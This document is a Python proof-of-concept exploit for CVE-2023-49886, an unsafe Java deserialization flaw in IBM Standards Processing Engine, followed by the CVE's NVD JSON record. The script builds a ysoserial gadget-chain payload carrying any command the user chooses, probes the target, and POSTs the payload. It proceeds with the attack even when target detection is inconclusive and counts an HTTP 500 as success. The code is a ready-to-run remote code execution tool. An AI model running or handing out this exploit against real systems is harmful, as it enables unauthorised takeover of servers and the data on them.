CVE-2023-49886

#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ CVE-2023-49886 PoC - IBM Standards Processing Engine Unsafe Deserialization RCE Description: This PoC demonstrates the exploitation of unsafe Java deserialization vulnerability in IBM Standards Processing Engine 10.0.1.10. It generates a malicious serialized payload using ysoserial tool and sends it to the target endpoint. """ import requests import subprocess import sys import argparse def generate_payload(gadget, command, output_file="payload.bin"): """ Generate malicious Java serialized payload using ysoserial. gadget: The gadget chain to use (e.g., CommonsCollections1, CommonsBeanutils1) command: The system command to execute on the target output_file: The output file path for the generated payload """ try: # Using ysoserial to generate the malicious serialized object cmd = [ "java", "-jar", "ysoserial-all.jar", gadget, command ] with open(output_file, "wb") as f: subprocess.run(cmd, stdout=f, check=True) print(f"[+] Payload generated successfully: {output_file}") return True except Exception as e: print(f"[-] Error generating payload: {e}") return False def exploit(target_url, payload_file, headers=None): """ Send the malicious serialized payload to the target IBM Standards Processing Engine. target_url: The vulnerable endpoint URL payload_file: The path to the generated payload file headers: Optional HTTP headers """ if headers is None: headers = { "Content-Type": "application/x-java-serialized-object", "User-Agent": "Mozilla/5.0" } try: with open(payload_file, "rb") as f: payload = f.read() print(f"[*] Sending payload to {target_url}") response = requests.post(target_url, data=payload, headers=headers, timeout=30) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Length: {len(response.content)}") if response.status_code == 200 or response.status_code == 500: print("[+] Target appears to be vulnerable!") return True else: print("[-] Target may not be vulnerable.") return False except Exception as e: print(f"[-] Exploitation error: {e}") return False def detect_target(target_url): """ Detect if the target is running IBM Standards Processing Engine. """ try: response = requests.get(target_url, timeout=10) server = response.headers.get("Server", "") powered_by = response.headers.get("X-Powered-By", "") indicators = ["IBM", "Standards Processing", "WebSphere"] for indicator in indicators: if indicator.lower() in (server + powered_by).lower(): print(f"[+] Detected target indicator: {indicator}") return True print("[*] Target identification inconclusive, proceeding with exploitation attempt...") return True except Exception as e: print(f"[-] Detection error: {e}") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2023-49886 PoC Exploit") parser.add_argument("-u", "--url", required=True, help="Target URL (e.g., http://target:port/endpoint)") parser.add_argument("-g", "--gadget", default="CommonsCollections1", help="ysoserial gadget chain") parser.add_argument("-c", "--command", default="whoami", help="Command to execute on target") parser.add_argument("-o", "--output", default="payload.bin", help="Payload output file") args = parser.parse_args() print("=" * 60) print("CVE-2023-49886 - IBM Standards Processing Engine RCE PoC") print("=" * 60) if detect_target(args.url): if generate_payload(args.gadget, args.command, args.output): exploit(args.url, args.output) print("[*] Done.")

{"cve": {"id": "CVE-2023-49886", "sourceIdentifier": "[email protected]", "published": "2025-10-06T15:16:01.123", "lastModified": "2025-10-16T18:13:37.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Standards Processing Engine 10.0.1.10 could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe java deserialization. By sending specially crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:transformation_extender_advanced:10.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "EB583067-9C60-463E-959D-ECB1FD824EE6"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7247179", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}